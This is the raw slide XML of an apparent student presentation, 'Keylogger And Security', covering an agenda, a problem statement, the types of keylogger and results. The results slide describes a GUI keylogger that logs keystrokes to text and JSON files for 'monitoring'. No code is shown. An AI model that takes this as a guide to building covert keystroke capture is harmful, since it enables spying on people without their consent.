                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="12700">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC041CF-6F1E-2225-9E68-75C48D407730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8896350" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent3">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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This project provides a basic keylogger with a simple GUI for user interaction. It effectively captures and logs keyboard events to both a text file and a JSON file, making it suitable for simple monitoring purposes.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ECFEA6-AF30-75BE-8026-20BE33BC7506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="228600"/>
            <a:ext cx="6100916"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IN" sz="4400" b="1" dirty="0">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>roject Link</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="22225">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231842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70560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0"/>
              <a:t>Keylogger And Security</a:t>
            </a:r>
            <a:endParaRPr sz="1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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A8519EA-C518-64DB-1BD8-235D2D52793B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99560" y="2113439"/>
            <a:ext cx="8861052" cy="255454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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="8000" b="1" dirty="0">
                <a:ln w="6600">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="accent2"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Keylogger And Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8000" b="1" dirty="0">
              <a:ln w="6600">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="accent2"/>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arn(inVertic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4EE79A6B-8F57-BA29-6162-25559D91C95D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="786085021"/>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7" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10687050" y="6134100"/>
            <a:ext cx="247650" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="447675" y="3472193"/>
            <a:ext cx="4124325" cy="3009900"/>
            <a:chOff x="47625" y="3819523"/>
            <a:chExt cx="4124325" cy="3009900"/>
          </a:xfrm>
          <a:noFill/>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="466725" y="6410325"/>
              <a:ext cx="3705225" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="47625" y="3819523"/>
              <a:ext cx="1733550" cy="3009898"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739774" y="445388"/>
            <a:ext cx="2689225" cy="62901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3335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-35" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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Oval 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E574BFFC-5A9C-12F4-388B-F5F929253EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11090530" y="6343650"/>
            <a:ext cx="499429" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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Diagram 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF9DA5C-1BAB-610B-CF43-EF105F25526A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1109125520"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1118871" y="1257300"/>
          <a:ext cx="8128000" cy="158510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7" name="Diagram 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0288D981-8CB3-19F8-B765-EBA1C5FCD5EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2069483313"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1132015" y="3015276"/>
          <a:ext cx="8128000" cy="158510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28" name="Diagram 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504BFF46-56E4-94B2-4E52-71EB4C9C3CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3752023866"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1112267" y="4727877"/>
          <a:ext cx="8128000" cy="99317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9789-8F3A-F750-7986-A583675C1794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="385444"/>
            <a:ext cx="11208067" cy="166199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l"/>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the Keylogger and Security?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keylogger and Security:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Diagram 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE264FF5-E5B4-F41C-1190-F1B5C4E66AB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1077751390"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1905000"/>
          <a:ext cx="6712268" cy="4001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BDFE67F4-97C2-EB5B-0A80-470D6E7B5C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3774508699"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7321868" y="1674580"/>
          <a:ext cx="4343400" cy="44619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7401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37B0-F1DC-2BA6-C822-C402A6268CF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="381000"/>
            <a:ext cx="10681335" cy="492443"/>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r>
              <a:rPr lang="en-IN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of Keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="Picture 3" descr="What is a Keylogger? How to Detect a ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A0A9B48-B933-E9B3-51F7-1931F2FAD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0768" y="2314159"/>
            <a:ext cx="3124200" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent5">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1500000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d prstMaterial="metal">
            <a:bevelT w="88900" h="88900" prst="riblet"/>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="15000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33ECB600-3D48-1072-7C6F-27F4AED809F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1233102"/>
            <a:ext cx="7924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1.Software Keyloggers</a:t>
            </a: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endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: These are programs that run in the background and capture keystrokes, then store or transmit this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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kernel-based Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: These are more sophisticated and operate at the operating system level, making them harder to detect.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2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API-based Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: These hook into the system’s API to intercept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6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Form-grabbing Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: These capture data submitted in web forms before it is encrypted.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2.Hardware Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="18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endParaRPr lang="en-US" altLang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External Devices</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Physical devices that are plugged into the computer, often between the keyboard and the computer.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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Firmware Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Embedded within the hardware, such as the BIOS or keyboard firmware.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3799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023928" cy="63222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6510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2727960" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="0" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ROB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="55" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="-20"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b="0" spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0"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b="0" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="-370" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="-375" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
